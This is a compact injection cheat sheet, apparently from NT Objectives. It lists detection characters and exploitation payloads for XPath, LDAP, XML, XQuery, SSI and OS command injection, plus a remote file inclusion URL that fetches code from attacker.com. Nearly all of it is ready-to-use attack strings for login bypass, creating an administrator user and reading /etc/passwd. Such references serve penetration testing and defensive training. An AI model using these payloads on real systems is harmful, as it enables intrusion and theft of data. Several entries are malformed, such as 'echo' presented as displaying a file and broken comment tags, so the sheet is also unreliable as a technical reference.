
INJECTION CHEATSHEET (non-SQL)

www.ntobjectives.com

XPATH Injection

Detection
  '                           single quote
  "                           double quote

Exploitation
  or 1=1 or =
  ] | * | user[@role=admin
  NODENAME                    returns all children of node
  //NODENAME                  returns all elements in the document
  NODENAME//SUBNODENAME       returns all SUBNODE under NODE element
  //NODENAME/[NAME=VALUE]     returns all NODE that have a NAME child equal to VALUE
  http://site.com/login.aspx?username=foo or 1=1 or =
                              Login bypass

LDAP Injection

Detection
  (                           opening bracket
  )                           closing bracket
  |                           Pipe - OR operator for LDAP
  &                           Ampersand - AND operator for LDAP
  !                           Exclamation - NOT operator for LDAP

Exploitation
  (&(param1=val1)(param2=val2))
                              AND operator
  (|(param1=val1)(param2=val2))
                              OR operator
  *)(ObjectClass=*)) (&(objectClass=void
                              Blind LDAP Injection using AND operator
  void)(ObjectClass=void)) (&(objectClass=void
                              Blind LDAP Injection using OR operator
  http://site.com/ldapsearch?user=*
                              Displays list of all users with attributes

Remote Code Injection

Upload File
  Upload file
  PHP, JSP, ASP etc.          Injecting active content
  execution!                  Access back from webroot

Remote file inclusion/injection
  include($incfile);          PHP call
  http://site.com/page.php?file=http://www.attacker.com/exploit
                              Injecting

XML Injection

Detection
  '                           single quote
  "                           double quote
  <>                          angular parentheses
  <!--/-->                    XML Comment tag
  &                           ampersand
  <![CDATA[ / ]]>             CDATA section delimiters

Exploitation
  <!-- EXISTING TAG -->       New value of existing tag along with tag name
  http://www.example.com/addUser.php?username=dan&password=123456<!-email: --><userid>0</userid><mail>foo@emaildomain.com
                              Add user as administrator

OS Command Injection

Detection
  | <ANOTHER COMMAND>         Pipe - On *NIX Output of first command to another, In Windows multiple commands execution
  ; <ANOTHER COMMAND>         semicolon - Running two commands together

Exploitation
  %<ENV VARIABLE>%            Windows only
  &                           Running command in background (*NIX Only)
  ://site.com/whois.php?domain=foobar; echo+/etc/passwd
                              Displays content of /etc/passwd file

XQuery Injection

Detection
  '                           single quote
  "                           double quote

Exploitation
  or <ATTACK> or .=
  something or =
  http://site.com/xmlsearch?user=foo or =
                              Displays list of all users with attributes

SSI Injection

Detection
  include, echo, exec         Look for word
  .SHTML                      File extension

Exploitation
  < ! # = / . - > and [a-zA-Z0-9]
                              Required characters for successful execution
  <!--#include virtual=<SOME SYSTEM FILE > -->
  http://site.com/ssiform.php?showfile=<!-#include virtual=/etc/passwd -->
                              Displays content of /etc/passwd file
